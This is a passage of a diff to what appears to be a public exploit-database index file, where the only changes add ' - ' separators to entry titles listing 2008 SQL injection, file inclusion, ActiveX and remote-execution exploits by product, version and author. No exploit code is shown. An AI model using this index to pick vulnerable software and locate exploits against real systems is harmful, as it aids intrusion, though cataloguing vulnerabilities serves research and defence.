Injection",2008-09-20,ZoRLu,php,webapps,0 +6502,platforms/php/webapps/6502.txt,"Diesel Pay Script - (area) SQL Injection",2008-09-20,ZoRLu,php,webapps,0 6503,platforms/php/webapps/6503.txt,"Plaincart 1.1.2 - (p) SQL Injection",2008-09-20,r45c4l,php,webapps,0 6504,platforms/php/webapps/6504.txt,"Oceandir 2.9 - (show_vote.php id) SQL Injection",2008-09-20,"JEEN HACKER TEAM",php,webapps,0 6505,platforms/php/webapps/6505.txt,"jPORTAL 2 - (humor.php id) SQL Injection",2008-09-20,r45c4l,php,webapps,0 @@ -6096,7 +6096,7 @@ id,file,description,date,author,platform,type,port 6520,platforms/php/webapps/6520.txt,"6rbScript 3.3 - (section.php name) Local File Inclusion",2008-09-21,Stack,php,webapps,0 6521,platforms/php/webapps/6521.txt,"Rianxosencabos CMS 0.9 - Insecure Cookie Handling",2008-09-21,Stack,php,webapps,0 6522,platforms/php/webapps/6522.txt,"Availscript Article Script - (view.php v) SQL Injection",2008-09-21,"Hussin X",php,webapps,0 -6523,platforms/php/webapps/6523.php,"WCMS 1.0b Arbitrary Add Admin Exploit",2008-09-22,"CWH Underground",php,webapps,0 +6523,platforms/php/webapps/6523.php,"WCMS 1.0b - Arbitrary Add Admin Exploit",2008-09-22,"CWH Underground",php,webapps,0 6524,platforms/php/webapps/6524.txt,"WSN Links 2.22/2.23 - (vote.php) SQL Injection",2008-09-22,d3v1l,php,webapps,0 6525,platforms/php/webapps/6525.txt,"WSN Links 2.20 - (comments.php) SQL Injection",2008-09-22,d3v1l,php,webapps,0 6526,platforms/php/webapps/6526.txt,"PHP iCalendar 2.24 - Insecure Cookie Handling",2008-09-22,Stack,php,webapps,0 @@ -6109,7 +6109,7 @@ id,file,description,date,author,platform,type,port 6533,platforms/php/webapps/6533.txt,"basebuilder 2.0.1 - (main.inc.php) Remote File Inclusion",2008-09-22,dun,php,webapps,0 6535,platforms/php/webapps/6535.txt,"Fez 1.3/2.0 RC1 - (list.php) SQL Injection",2008-09-22,d3v1l,php,webapps,0 6536,platforms/php/webapps/6536.pl,"CJ Ultra Plus 1.0.4 Cookie SQL Injection Exploit",2008-09-22,-SmoG-,php,webapps,0 -6537,platforms/windows/remote/6537.html,"Chilkat XML ActiveX Remote Arbitrary File Creation/Execution Exploit",2008-09-23,shinnai,windows,remote,0 +6537,platforms/windows/remote/6537.html,"Chilkat XML - ActiveX Remote Arbitrary File Creation/Execution Exploit",2008-09-23,shinnai,windows,remote,0 6538,platforms/php/webapps/6538.txt,"OpenRat 0.8-beta4 - (tpl_dir) Remote File Inclusion",2008-09-23,dun,php,webapps,0 6539,platforms/php/webapps/6539.txt,"Sofi WebGui 0.6.3 PRE (mod_dir) Remote File Inclusion",2008-09-23,dun,php,webapps,0 6540,platforms/php/webapps/6540.pl,"iGaming CMS 1.5 - Multiple SQL Injection Exploit",2008-09-23,StAkeR,php,webapps,0 @@ -6120,7 +6120,7 @@ id,file,description,date,author,platform,type,port 6545,platforms/php/webapps/6545.txt,"Hotscripts Clone - (cid) SQL Injection",2008-09-24,"Hussin X",php,webapps,0 6546,platforms/php/webapps/6546.pl,"Rianxosencabos CMS 0.9 - Remote Add Admin Exploit",2008-09-24,ka0x,php,webapps,0 6547,platforms/php/webapps/6547.txt,"Ol Bookmarks Manager 0.7.5 - RFI / LFI / SQL Injection",2008-09-24,GoLd_M,php,webapps,0 -6548,platforms/windows/remote/6548.html,"BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution",2008-09-24,shinnai,windows,remote,0 +6548,platforms/windows/remote/6548.html,"BurnAware - NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution",2008-09-24,shinnai,windows,remote,0 6549,platforms/php/webapps/6549.txt,"Jetik Emlak ESA 2.0 - Multiple SQL Injection",2008-09-24,ZoRLu,php,webapps,0 6550,platforms/php/webapps/6550.txt,"AJ Auction Pro Platinum Skin - (detail.php item_id) SQL Injection",2008-09-24,GoLd_M,php,webapps,0 6551,platforms/php/webapps/6551.txt,"emergecolab 1.0 - (sitecode) Local File Inclusion",2008-09-24,dun,php,webapps,0 @@ -6197,7 +6197,7 @@ id,file,description,date,author,platform,type,port 6623,platforms/php/webapps/6623.txt,"events calendar 1.1 - Remote File Inclusion",2008-09-29,"k3vin mitnick",php,webapps,0 6624,platforms/php/webapps/6624.txt,"Arcadem Pro - (articlecat) SQL Injection",2008-09-29,"Hussin X",php,webapps,0 6625,platforms/php/webapps/6625.txt,"Post Comments 3.0 - Insecure Cookie Handling",2008-09-29,Crackers_Child,php,webapps,0 -6626,platforms/php/webapps/6626.txt,"PG Matchmaking Script Multiple SQL Injection",2008-09-29,"Super Cristal",php,webapps,0 +6626,platforms/php/webapps/6626.txt,"PG Matchmaking Script - Multiple SQL Injection",2008-09-29,"Super Cristal",php,webapps,0 6628,platforms/php/webapps/6628.txt,"ArabCMS - (rss.php rss) Local File Inclusion",2008-09-29,JIKO,php,webapps,0 6629,platforms/php/webapps/6629.txt,"FAQ Management Script - (catid) SQL Injection",2008-09-30,"Hussin X",php,webapps,0 6630,platforms/windows/remote/6630.html,"Autodesk DWF Viewer Control / LiveUpdate Module - Remote Exploit",2008-09-30,Nine:Situations:Group,windows,remote,0 @@ -6219,10 +6219,10 @@ id,file,description,date,author,platform,type,port 6646,platforms/php/webapps/6646.php,"phpScheduleIt 1.2.10 - (reserve.php) Remote Code Execution Exploit",2008-10-01,EgiX,php,webapps,0 6647,platforms/windows/dos/6647.c,"ESET SysInspector - 1.1.1.0 (esiadrv.sys) Proof of Concept Exploit",2008-10-01,"NT Internals",windows,dos,0 6648,platforms/php/webapps/6648.txt,"RPortal 1.1 - (file_op) Remote File Inclusion",2008-10-01,Kad,php,webapps,0 -6649,platforms/php/webapps/6649.txt,"phpscripts Ranking Script Insecure Cookie Handling",2008-10-01,Crackers_Child,php,webapps,0 +6649,platforms/php/webapps/6649.txt,"phpscripts Ranking Script - Insecure Cookie Handling",2008-10-01,Crackers_Child,php,webapps,0 6650,platforms/php/webapps/6650.txt,"Link Trader - (ratelink.php lnkid) SQL Injection",2008-10-01,"Hussin X",php,webapps,0 6651,platforms/windows/dos/6651.pl,"vxFtpSrv 2.0.3 CWD command Remote Buffer Overflow PoC",2008-10-02,"Julien Bedard",windows,dos,0 -6652,platforms/php/webapps/6652.txt,"Bux.to Clone Script Insecure Cookie Handling",2008-10-02,SirGod,php,webapps,0 +6652,platforms/php/webapps/6652.txt,"Bux.to Clone Script - Insecure Cookie Handling",2008-10-02,SirGod,php,webapps,0 6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 - (infile) Local File Inclusion",2008-10-02,ZeN,php,webapps,0 6654,platforms/windows/dos/6654.pl,"mIRC 6.34 - Remote Buffer Overflow PoC",2008-10-02,securfrog,windows,dos,0 6655,platforms/php/webapps/6655.php,"OpenX 2.6 - (ac.php bannerid) Remote Blind SQL Injection Exploit",2008-10-02,d00m3r4ng,php,webapps,0 @@ -6248,7 +6248,7 @@ id,file,description,date,author,platform,type,port 6676,platforms/php/webapps/6676.txt,"opennms < 1.5.96 - Multiple Vulnerabilities",2008-10-05,"BugSec LTD",php,webapps,0 6677,platforms/php/webapps/6677.pl,"geccBBlite 2.0 - (leggi.php id) SQL Injection Exploit",2008-10-05,Piker,php,webapps,0 6678,platforms/php/webapps/6678.txt,"fastpublish CMS 1.9999 - (LFI/SQL) Multiple Vulnerabilities",2008-10-05,~!Dok_tOR!~,php,webapps,0 -6679,platforms/php/webapps/6679.txt,"phpAbook 0.8.8b (COOKIE) Local File Inclusion",2008-10-05,JosS,php,webapps,0 +6679,platforms/php/webapps/6679.txt,"phpAbook 0.8.8b - (COOKIE) Local File Inclusion",2008-10-05,JosS,php,webapps,0 6680,platforms/php/webapps/6680.txt,"FOSS Gallery Public 1.0 - Arbitrary File Upload",2008-10-05,Pepelux,php,webapps,0 6681,platforms/php/webapps/6681.txt,"PHP-Fusion Mod manuals (manual) SQL Injection",2008-10-05,boom3rang,php,webapps,0 6682,platforms/php/webapps/6682.txt,"PHP-Fusion Mod raidtracker_panel (INFO_RAID_ID) SQL Injection",2008-10-05,boom3rang,php,webapps,0 @@ -6267,7 +6267,7 @@ id,file,description,date,author,platform,type,port 6696,platforms/php/webapps/6696.txt,"PHP Autos 2.9.1 - (searchresults.php catid) SQL Injection",2008-10-07,Mr.SQL,php,webapps,0 6697,platforms/php/webapps/6697.txt,"Built2Go PHP RealEstate 1.5 - (event_detail.php) SQL Injection",2008-10-07,d3v1l,php,webapps,0 6698,platforms/php/webapps/6698.txt,"TorrentTrader Classic 1.04 - Blind SQL Injection",2008-10-07,BazOka-HaCkEr,php,webapps,0 -6699,platforms/windows/remote/6699.html,"Microsoft PicturePusher ActiveX Cross-Site File Upload Attack PoC",2008-10-08,Nine:Situations:Group,windows,remote,0 +6699,platforms/windows/remote/6699.html,"Microsoft PicturePusher - ActiveX Cross-Site File Upload Attack PoC",2008-10-08,Nine:Situations:Group,windows,remote,0 6700,platforms/php/webapps/6700.txt,"DFF PHP Framework API (Data Feed File) - Remote File Inclusion",2008-10-08,GoLd_M,php,webapps,0 6701,platforms/php/webapps/6701.txt,"HispaH textlinksads - (index.php) SQL Injection",2008-10-08,InjEctOr5,php,webapps,0 6702,platforms/php/webapps/6702.txt,"AdMan 1.1.20070907 - (campaignId) SQL Injection",2008-10-08,SuB-ZeRo,php,webapps,0 @@ -6342,7 +6342,7 @@ id,file,description,date,author,platform,type,port 6772,platforms/php/webapps/6772.txt,"Post Affiliate Pro 2.0 - (index.php md) Local File Inclusion",2008-10-16,ZeN,php,webapps,0 6773,platforms/windows/remote/6773.html,"Hummingbird Deployment Wizard 2008 - ActiveX Command Execution",2008-10-17,shinnai,windows,remote,0 6774,platforms/windows/remote/6774.html,"Hummingbird Deployment Wizard 2008 Registry Values Creation/Change",2008-10-17,shinnai,windows,remote,0 -6775,platforms/solaris/dos/6775.c,"Solaris 9 PortBind XDR-DECODE taddr2uaddr() Remote Denial of Service",2008-10-17,"Federico L. Bossi Bonin",solaris,dos,0 +6775,platforms/solaris/dos/6775.c,"Solaris 9 PortBind - XDR-DECODE taddr2uaddr() Remote Denial of Service",2008-10-17,"Federico L. Bossi Bonin",solaris,dos,0 6776,platforms/windows/remote/6776.html,"Hummingbird Deployment Wizard 2008 - ActiveX File Execution(2)",2008-10-17,shinnai,windows,remote,0 6777,platforms/php/webapps/6777.txt,"WordPress Plugin st_newsletter - (stnl_iframe.php) SQL Injection",2008-10-17,r45c4l,php,webapps,0 6778,platforms/php/webapps/6778.pl,"XOOPS Module GesGaleri (kategorino) SQL Injection Exploit",2008-10-18,EcHoLL,php,webapps,0 @@ -6443,14 +6443,14 @@ id,file,description,date,author,platform,type,port 6875,platforms/windows/remote/6875.html,"Visagesoft eXPert PDF ViewerX - (VSPDFViewerX.ocx) File Overwrite",2008-10-29,"Marco Torti",windows,remote,0 6876,platforms/php/webapps/6876.txt,"Venalsur on-line Booking Centre (OfertaID) XSS/SQL Injection",2008-10-29,d3b4g,php,webapps,0 6877,platforms/php/webapps/6877.txt,"Pro Traffic One - (poll_results.php id) SQL Injection",2008-10-29,"Hussin X",php,webapps,0 -6878,platforms/windows/remote/6878.html,"DjVu ActiveX Control 3.0 ImageURL Property Overflow Exploit",2008-10-30,"Shahriyar Jalayeri",windows,remote,0 +6878,platforms/windows/remote/6878.html,"DjVu - ActiveX Control 3.0 ImageURL Property Overflow Exploit",2008-10-30,"Shahriyar Jalayeri",windows,remote,0 6879,platforms/php/webapps/6879.txt,"MyPHP Forum 3.0 Edit Topics/Blind SQL Injection",2008-10-30,StAkeR,php,webapps,0 6880,platforms/windows/remote/6880.html,"Opera 9.61 opera:historysearch Code Execution Exploit PoC",2008-10-30,"Aviv Raff",windows,remote,0 6881,platforms/php/webapps/6881.txt,"Absolute File Send 1.0 - Remote Cookie Handling",2008-10-30,Hakxer,php,webapps,0 6882,platforms/php/webapps/6882.txt,"Absolute Podcast 1.0 - Remote Insecure Cookie Handling",2008-10-30,Hakxer,php,webapps,0 6883,platforms/php/webapps/6883.txt,"Absolute Poll Manager XE 4.1 - Cookie Handling",2008-10-30,Hakxer,php,webapps,0 6885,platforms/php/webapps/6885.txt,"e107 Plugin lyrics_menu - (lyrics_song.php l_id) SQL Injection",2008-10-31,ZoRLu,php,webapps,0 -6886,platforms/php/webapps/6886.txt,"Tribiq CMS 5.0.9a (beta) Insecure Cookie Handling",2008-10-31,ZoRLu,php,webapps,0 +6886,platforms/php/webapps/6886.txt,"Tribiq CMS 5.0.9a (beta) - Insecure Cookie Handling",2008-10-31,ZoRLu,php,webapps,0 6887,platforms/php/webapps/6887.txt,"Cybershade CMS 0.2b - Remote File Inclusion",2008-10-31,w0cker,php,webapps,0 6888,platforms/php/webapps/6888.txt,"Tribiq CMS 5.0.10a - Local File Inclusion (Windows)",2008-10-31,GoLd_M,php,webapps,0 6889,platforms/php/webapps/6889.txt,"Absolute Content Rotator 6.0 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 @@ -6503,7 +6503,7 @@ id,file,description,date,author,platform,type,port 6936,platforms/php/webapps/6936.txt,"YourFreeWorld Banner Management (id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6937,platforms/php/webapps/6937.txt,"YourFreeWorld Blog Blaster (id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6938,platforms/php/webapps/6938.txt,"YourFreeWorld Autoresponder Hosting (id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 -6939,platforms/php/webapps/6939.txt,"YourFreeWorld Forced Matrix Script (id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 +6939,platforms/php/webapps/6939.txt,"YourFreeWorld Forced Matrix Script - (id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6940,platforms/php/webapps/6940.txt,"YourFreeWorld Short Url & Url Tracker - (id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6941,platforms/php/webapps/6941.txt,"YourFreeWorld Viral Marketing (id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6942,platforms/php/webapps/6942.txt,"YourFreeWorld Scrolling Text Ads (id) SQL Injection",2008-11-01,"Hussin X",php,webapps,0 @@ -6532,7 +6532,7 @@ id,file,description,date,author,platform,type,port 6966,platforms/php/webapps/6966.txt,"Acc PHP eMail 1.1 - Insecure Cookie Handling",2008-11-03,Hakxer,php,webapps,0 6967,platforms/php/webapps/6967.txt,"MatPo Link 1.2b - (view.php id) SQL Injection",2008-11-03,ZoRLu,php,webapps,0 6968,platforms/php/webapps/6968.txt,"Acc Autos 4.0 - Insecure Cookie Handling",2008-11-03,x0r,php,webapps,0 -6969,platforms/php/webapps/6969.txt,"Apoll 0.7b (SQL Injection) Remote Auth Bypass",2008-11-03,ZoRLu,php,webapps,0 +6969,platforms/php/webapps/6969.txt,"Apoll 0.7b - (SQL Injection) Remote Auth Bypass",2008-11-03,ZoRLu,php,webapps,0 6971,platforms/php/webapps/6971.txt,"MatPo Link 1.2b - (Blind SQL Injection/XSS) Multiple Vulnerabilities",2008-11-03,Hakxer,php,webapps,0 6972,platforms/php/webapps/6972.txt,"pppBlog 0.3.11 - (randompic.php) File Disclosure",2008-11-03,JosS,php,webapps,0 6973,platforms/php/webapps/6973.txt,"TBmnetCMS 1.0 - (index.php content) Local File Inclusion",2008-11-04,d3v1l,php,webapps,0 @@ -6566,12 +6566,12 @@ id,file,description,date,author,platform,type,port 7001,platforms/php/webapps/7001.txt,"DFLabs PTK 1.0 - Local Command Execution",2008-11-05,ikki,php,webapps,0 7002,platforms/php/webapps/7002.txt,"Joomla Component Dada Mail Manager 2.6 - Remote File Inclusion",2008-11-05,NoGe,php,webapps,0 7003,platforms/php/webapps/7003.txt,"PHP Auto Listings - (moreinfo.php pg) SQL Injection",2008-11-05,G4N0K,php,webapps,0 -7004,platforms/php/webapps/7004.txt,"Pre Simple CMS (Auth Bypass) SQL Injection",2008-11-05,"Hussin X",php,webapps,0 -7005,platforms/php/webapps/7005.txt,"PHP JOBWEBSITE PRO (Auth Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0 +7004,platforms/php/webapps/7004.txt,"Pre Simple CMS - (Auth Bypass) SQL Injection",2008-11-05,"Hussin X",php,webapps,0 +7005,platforms/php/webapps/7005.txt,"PHP JOBWEBSITE PRO - (Auth Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0 7006,platforms/windows/local/7006.txt,"Adobe Reader - util.printf() JavaScript Function Stack Overflow Exploit (2)",2008-11-05,"Debasis Mohanty",windows,local,0 7007,platforms/php/webapps/7007.txt,"HarlandScripts drinks (recid) SQL Injection Velnerability",2008-11-05,"Ex Tacy",php,webapps,0 -7008,platforms/php/webapps/7008.txt,"Pre Real Estate Listings (Auth Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0 -7009,platforms/php/webapps/7009.txt,"Mole Group Airline Ticket Script SQL Injection",2008-11-05,InjEctOr5,php,webapps,0 +7008,platforms/php/webapps/7008.txt,"Pre Real Estate Listings - (Auth Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0 +7009,platforms/php/webapps/7009.txt,"Mole Group Airline Ticket Script - SQL Injection",2008-11-05,InjEctOr5,php,webapps,0 7010,platforms/php/webapps/7010.txt,"Mole Group Taxi Calc Dist Script - (Auth Bypass) SQL Injection",2008-11-05,InjEctOr5,php,webapps,0 7011,platforms/php/webapps/7011.pl,"Simple Machines Forum 1.1.6 - (LFI) Code Execution Exploit",2008-11-05,~elmysterio,php,webapps,0 7012,platforms/php/webapps/7012.txt,"hMAilServer 4.4.2 - (PHPWebAdmin) File Inclusion",2008-11-06,Nine:Situations:Group,php,webapps,0 @@ -6580,11 +6580,11 @@ id,file,description,date,author,platform,type,port 7015,platforms/php/webapps/7015.txt,"DevelopItEasy Membership System 1.3 - (Auth Bypass) SQL Injection",2008-11-06,InjEctOr5,php,webapps,0 7016,platforms/php/webapps/7016.txt,"DevelopItEasy Photo Gallery 1.2 - SQL Injection",2008-11-06,InjEctOr5,php,webapps,0 7017,platforms/php/webapps/7017.txt,"Pre ADS Portal 2.0 - (Auth Bypass/XSS) Multiple Vulnerabilities",2008-11-06,G4N0K,php,webapps,0 -7018,platforms/php/webapps/7018.txt,"NICE FAQ Script (Auth Bypass) SQL Injection",2008-11-06,r45c4l,php,webapps,0 +7018,platforms/php/webapps/7018.txt,"NICE FAQ Script - (Auth Bypass) SQL Injection",2008-11-06,r45c4l,php,webapps,0 7019,platforms/php/webapps/7019.txt,"Arab Portal 2.1 (Windows) - Remote File Disclosure",2008-11-06,"Khashayar Fereidani",php,webapps,0 7020,platforms/php/webapps/7020.txt,"MySQL Quick Admin 1.5.5 - Local File Inclusion",2008-11-06,"Vinod Sharma",php,webapps,0 7021,platforms/php/webapps/7021.txt,"SoftComplex PHP Image Gallery 1.0 - (Auth Bypass) SQL Injection",2008-11-06,Cyber-Zone,php,webapps,0 -7022,platforms/php/webapps/7022.txt,"LoveCMS 1.6.2 Final Arbitrary File Delete",2008-11-06,cOndemned,php,webapps,0 +7022,platforms/php/webapps/7022.txt,"LoveCMS 1.6.2 Final - Arbitrary File Delete",2008-11-06,cOndemned,php,webapps,0 7023,platforms/php/webapps/7023.txt,"DeltaScripts PHP Classifieds 7.5 - (Auth Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0 7024,platforms/php/webapps/7024.txt,"DeltaScripts PHP Links 1.3 - (Auth Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0 7025,platforms/php/webapps/7025.txt,"DeltaScripts PHP Shop 1.0 - (Auth Bypass) SQL Injection",2008-11-06,ZoRLu,php,webapps,0 @@ -6605,8 +6605,8 @@ id,file,description,date,author,platform,type,port 7042,platforms/php/webapps/7042.txt,"PHP Auto Listings Script - (Auth Bypass) SQL Injection",2008-11-07,r45c4l,php,webapps,0 7043,platforms/php/webapps/7043.txt,"Mole Group Rental Script - (Auth Bypass) SQL Injection",2008-11-07,Cyber-Zone,php,webapps,0 7044,platforms/php/webapps/7044.txt,"MyioSoft Ajax Portal 3.0 - (Auth Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0 -7045,platforms/php/webapps/7045.txt,"MyioSoft EasyBookMarker (Auth Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0 -7046,platforms/php/webapps/7046.txt,"MyioSoft EasyCalendar (Auth Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0 +7045,platforms/php/webapps/7045.txt,"MyioSoft EasyBookMarker - (Auth Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0 +7046,platforms/php/webapps/7046.txt,"MyioSoft EasyCalendar - (Auth Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0 7047,platforms/php/webapps/7047.txt,"DeltaScripts PHP Classifieds 7.5 - SQL Injection",2008-11-07,ZoRLu,php,webapps,0 7048,platforms/php/webapps/7048.txt,"E-topbiz Online Store 1 - (cat_id) SQL Injection",2008-11-07,Stack,php,webapps,0 7049,platforms/php/webapps/7049.txt,"Mini Web Calendar 1.2 - (File Disclosure/XSS) Multiple Vulnerabilities",2008-11-07,ahmadbady,php,webapps,0 @@ -6642,8 +6642,8 @@ id,file,description,date,author,platform,type,port 7080,platforms/php/webapps/7080.txt,"fresh email script 1.0 - Multiple Vulnerabilities",2008-11-10,Don,php,webapps,0 7081,platforms/php/webapps/7081.txt,"AJ ARTICLE Remote Authentication Bypass",2008-11-10,G4N0K,php,webapps,0 7082,platforms/php/webapps/7082.txt,"PHPStore Car Dealers Remote File Upload",2008-11-10,ZoRLu,php,webapps,0 -7083,platforms/php/webapps/7083.txt,"PHPStore PHP Job Search Script Remote File Upload",2008-11-10,ZoRLu,php,webapps,0 -7084,platforms/php/webapps/7084.txt,"PHPStore Complete Classifieds Script File Upload",2008-11-10,ZoRLu,php,webapps,0 +7083,platforms/php/webapps/7083.txt,"PHPStore PHP Job Search Script - Remote File Upload",2008-11-10,ZoRLu,php,webapps,0 +7084,platforms/php/webapps/7084.txt,"PHPStore Complete Classifieds Script - File Upload",2008-11-10,ZoRLu,php,webapps,0 7085,platforms/php/webapps/7085.txt,"PHPStore Real Estate Remote File Upload",2008-11-10,ZoRLu,php,webapps,0 7086,platforms/php/webapps/7086.txt,"AJSquare Free Polling Script - (DB) Multiple Vulnerabilities",2008-11-10,G4N0K,php,webapps,0 7087,platforms/php/webapps/7087.txt,"AJ Auction Authentication - Bypass",2008-11-10,G4N0K,php,webapps,0 @@ -6660,7 +6660,7 @@ id,file,description,date,author,platform,type,port 7098,platforms/php/webapps/7098.txt,"PozScripts Business Directory Script - (cid) SQL Injection",2008-11-11,"Hussin X",php,webapps,0 7099,platforms/windows/dos/7099.pl,"Castle Rock Computing SNMPc < 7.1.1 - (Community) Remote BoF PoC",2008-11-12,"Praveen Darshanam",windows,dos,0 7100,platforms/linux/dos/7100.pl,"Net-SNMP 5.1.4/5.2.4/5.4.1 Perl Module Buffer Overflow PoC",2008-11-12,"Praveen Darshanam",linux,dos,0 -7101,platforms/php/webapps/7101.txt,"AlstraSoft SendIt Pro Remote File Upload",2008-11-12,ZoRLu,php,webapps,0 +7101,platforms/php/webapps/7101.txt,"AlstraSoft SendIt Pro - Remote File Upload",2008-11-12,ZoRLu,php,webapps,0 7102,platforms/php/webapps/7102.txt,"AlstraSoft Article Manager Pro - (Auth Bypass) SQL Injection",2008-11-12,ZoRLu,php,webapps,0 7103,platforms/php/webapps/7103.txt,"AlstraSoft Web Host Directory - (Auth Bypass) SQL Injection",2008-11-12,ZoRLu,php,webapps,0 7104,platforms/windows/remote/7104.c,"Microsoft Windows Server - Code Execution Exploit (MS08-067)",2008-11-12,Polymorphours,windows,remote,135 @@ -6716,8 +6716,8 @@ id,file,description,date,author,platform,type,port 7159,platforms/php/webapps/7159.php,"PunBB (Private Messaging System 1.2.x) - Multiple LFI Exploit",2008-11-19,StAkeR,php,webapps,0 7160,platforms/php/webapps/7160.php,"MyTopix 1.3.0 - (notes send) SQL Injection Exploit",2008-11-19,cOndemned,php,webapps,0 7162,platforms/php/webapps/7162.pl,"MauryCMS 0.53.2 - Remote Shell Upload Exploit",2008-11-19,StAkeR,php,webapps,0 -7163,platforms/php/webapps/7163.txt,"RevSense (Auth bypass) SQL Injection",2008-11-19,d3b4g,php,webapps,0 -7164,platforms/php/webapps/7164.txt,"Pre Job Board (Auth Bypass) SQL Injection",2008-11-19,R3d-D3V!L,php,webapps,0 +7163,platforms/php/webapps/7163.txt,"RevSense - (Auth bypass) SQL Injection",2008-11-19,d3b4g,php,webapps,0 +7164,platforms/php/webapps/7164.txt,"Pre Job Board - (Auth Bypass) SQL Injection",2008-11-19,R3d-D3V!L,php,webapps,0 7165,platforms/php/webapps/7165.pl,"wPortfolio 0.3 - Remote Arbitrary File Upload Exploit",2008-11-19,Osirys,php,webapps,0 7166,platforms/php/webapps/7166.txt,"AskPert - (Auth bypass) SQL Injection",2008-11-19,TR-ShaRk,php,webapps,0 7167,platforms/windows/remote/7167.html,"Exodus 0.10 - (uri handler) Arbitrary Parameter Injection Exploit",2008-11-20,Nine:Situations:Group,windows,remote,0 @@ -6748,12 +6748,12 @@ id,file,description,date,author,platform,type,port 7197,platforms/php/webapps/7197.txt,"Goople CMS 1.7 - Remote File Upload",2008-11-23,x0r,php,webapps,0 7198,platforms/php/webapps/7198.txt,"NetArtMedia Cars Portal 2.0 - (image.php id) SQL Injection",2008-11-23,snakespc,php,webapps,0 7199,platforms/php/webapps/7199.txt,"NetArtMedia Blog System - (image.php id) SQL Injection",2008-11-23,snakespc,php,webapps,0 -7200,platforms/php/webapps/7200.txt,"PG Real Estate (Auth Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0 -7201,platforms/php/webapps/7201.txt,"PG Roomate Finder Solution (Auth Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0 +7200,platforms/php/webapps/7200.txt,"PG Real Estate - (Auth Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0 +7201,platforms/php/webapps/7201.txt,"PG Roomate Finder Solution - (Auth Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0 7202,platforms/php/webapps/7202.txt,"PG Job Site (poll_view_id) Blind SQL Injection",2008-11-23,ZoRLu,php,webapps,0 7204,platforms/php/webapps/7204.txt,"modx CMS 0.9.6.2 - (RFI/XSS) Multiple Vulnerabilities",2008-11-23,RoMaNcYxHaCkEr,php,webapps,0 7205,platforms/php/webapps/7205.txt,"Goople CMS 1.7 - Insecure Cookie Handling",2008-11-23,BeyazKurt,php,webapps,0 -7206,platforms/php/webapps/7206.txt,"PHP Classifieds Script Remote Database Disclosure",2008-11-23,InjEctOr5,php,webapps,0 +7206,platforms/php/webapps/7206.txt,"PHP Classifieds Script - Remote Database Disclosure",2008-11-23,InjEctOr5,php,webapps,0 7207,platforms/windows/dos/7207.pl,"Nero ShowTime 5.0.15.0 m3u Playlist File Remote Buffer Overflow PoC",2008-11-24,LiquidWorm,windows,dos,0 7208,platforms/php/webapps/7208.txt,"NetArtMedia Real Estate Portal 1.2 - (ad_id) SQL Injection",2008-11-24,"Hussin X",php,webapps,0 7209,platforms/windows/dos/7209.pl,"W3C Amaya 10.1 Web Browser (URL Bar) Remote Stack Overflow PoC",2008-11-24,r0ut3r,windows,dos,0 @@ -6796,7 +6796,7 @@ id,file,description,date,author,platform,type,port 7246,platforms/php/webapps/7246.txt,"Ocean12 Poll Manager Pro Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0 7247,platforms/php/webapps/7247.txt,"Ocean12 Calendar Manager Gold Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0 7248,platforms/php/webapps/7248.txt,"Family Project 2.x - (Auth Bypass) SQL Injection",2008-11-27,The_5p3ctrum,php,webapps,0 -7249,platforms/windows/dos/7249.php,"i.Scribe SMTP Client 2.00b (wscanf) Remote Format String PoC",2008-11-27,"Alfons Luja",windows,dos,0 +7249,platforms/windows/dos/7249.php,"i.Scribe SMTP Client 2.00b - (wscanf) Remote Format String PoC",2008-11-27,"Alfons Luja",windows,dos,0 7250,platforms/php/webapps/7250.txt,"RakhiSoftware Shopping Cart (subcategory_id) SQL Injection",2008-11-27,XaDoS,php,webapps,0 7251,platforms/php/webapps/7251.txt,"Star Articles 6.0 - Remote File Upload",2008-11-27,ZoRLu,php,webapps,0 7252,platforms/php/webapps/7252.txt,"Web Calendar 4.1 - (Auth Bypass) SQL Injection",2008-11-27,Cyber-Zone,php,webapps,0 @@ -6813,10 +6813,10 @@ id,file,description,date,author,platform,type,port 7264,platforms/windows/local/7264.txt,"Apache Tomcat - runtime.getRuntime().exec() Privilege Escalation (Windows)",2008-11-28,Abysssec,windows,local,0 7265,platforms/php/webapps/7265.txt,"web calendar system 3.40 - (XSS/SQL) Multiple Vulnerabilities",2008-11-28,Bl@ckbe@rD,php,webapps,0 7266,platforms/php/webapps/7266.pl,"All Club CMS 0.0.2 - Remote DB Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0 -7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a (Auth Bypass) SQL Injection",2008-11-28,JIKO,php,webapps,0 +7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a - (Auth Bypass) SQL Injection",2008-11-28,JIKO,php,webapps,0 7268,platforms/php/webapps/7268.txt,"Bluo CMS 1.2 - (index.php id) Blind SQL Injection",2008-11-28,The_5p3ctrum,php,webapps,0 7269,platforms/php/webapps/7269.pl,"CMS little 0.0.1 - (index.php term) SQL Injection Exploit",2008-11-28,"CWH Underground",php,webapps,0 -7270,platforms/php/webapps/7270.txt,"ReVou Twitter Clone (Auth Bypass) 